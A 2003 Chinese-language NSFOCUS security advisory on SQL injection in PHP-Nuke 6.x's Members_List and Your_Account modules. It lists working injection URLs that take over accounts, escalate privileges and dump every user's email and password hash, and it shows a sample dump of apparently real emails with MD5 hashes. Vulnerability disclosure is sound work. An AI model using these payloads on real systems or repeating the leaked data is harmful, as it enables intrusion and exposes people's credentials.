首页 -> 安全研究

安全研究

安全漏洞
PHP-Nuke多个SQL注入漏洞

发布日期:2003-03-06
更新日期:2003-03-12

受影响系统:
Francisco Burzi PHP-Nuke 6.5 BETA1
Francisco Burzi PHP-Nuke 6.0
描述:
BUGTRAQ  ID: 7031

PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。

PHP-Nuke中的'Members_List'和'Your_Account'脚本对用于构建SQL查询的外部数据缺少正确过滤,远程攻击者可以利用这个漏洞进行破坏数据库系统,控制PHP-Nuke等攻击。

'Members_List'和'Your_Account'模块中的脚本对用户提交的数据缺少正确过滤,攻击者可以插入恶意数据到提交的SQL查询中,导致修改原来的查询逻辑,可破坏整个PHP-Nuke系统。也可以用于其他类型的攻击,如显示用户,更改管理员用户名,把普通用户权限更改为管理员权限,或包括所有用户EMAIL和加密密码信息到指定文件中等等。

<*来源:Frog Man (leseulfrog@hotmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104696925831786&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Frog Man (leseulfrog@hotmail.com)提供了如下测试方法:

Members_List :

- 显示用户(以加密密码排序) :
http://[target]/modules.php?name=Members_List&letter=All&sortby=pass

- 显示用户(以UID排序) :
http://[target]/modules.php?name=Members_List&letter=All&sortby=uid

- 显示版主:
http://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='2'/*

- 显示管理员:
http://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='4'/*

- 显示所有加密密码以'abc'开头的用户:
http://[target]/modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'abc%25'/*


Your_Account :
- 更改'Admin'名用户为"hophophop" :

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',name='Hophophop'%20where%20uname='Admin'/*&uid=[OUR_UID]

- 更改Bob的MD5加密密码为:
'd41d8cd98f00b204e9800998ecf8427e' :

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&realname=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&email=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savehome&storynum=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savecomm&umode=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savecomm&thold=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]

- 更改用户帐户为管理员正户:
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&femail=',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=',user_level='4&uid=[OUR_UID]


- 保存所有用户EMAIL和加密密码信息到http://[target]/AllMailPass.txt中:

http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=')%20OR%201=1%20INTO%20OUTFILE%20'/[path/to/site]/AllMailPass.txt'/*

http://[target]/AllMailPass.txt文件信息类似:
--------------------------------------------------------
chaeyut@yahoo.com    a34e83e6658923ceb100abb52cd31df6
for-ever@yahoo.com    5728cea4924d9097c78d08165ad1dd8a
runbur@netzero.com    546fa9501a436d4615b798f856386ba8
venom@yahoo.com        614edfbc874f09d75b98240295a8f39f
gotchakd@yahoo.de    fbd125e74581979d2b7fc6e2b360e286
cfischer@mindspring.com    9407c826d8e3c07ad37cb2d13d1cb641
mike@xiradio.com    f9ac6b05beccb0fc5837b6a7fef4c1d3
mikdif@yahoo.com    6106edf3e22b0cd8609fa1112d0ae962
mcurry@hotmail.com    739897be3e14cf5a9fb032069f522b77
--------------------------------------------------------


- 保存uid190~196之间用户的信息:
into http://[target]/1.txt :

http://[target]/modules.php?name=Your_Account&op=userinfo&uname='%20OR%20uid>190%20AND%20uid<196%20INTO%20OUTFILE%20'/[path/to/site]/1.txt


- 保存所有管理员版主等信息到http://[target]/admintxt中:

http://[target]/modules.php?name=Your_Account&op=login&uname='%20OR%user_level>1%20INTO%20OUTFILE%20'/[path/to/site]/admin.txt

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在php.ini文件中设置'magic_quotes_gpc'为'on'。

厂商补丁:

Francisco Burzi
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.phpnuke.org

浏览次数:5766
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客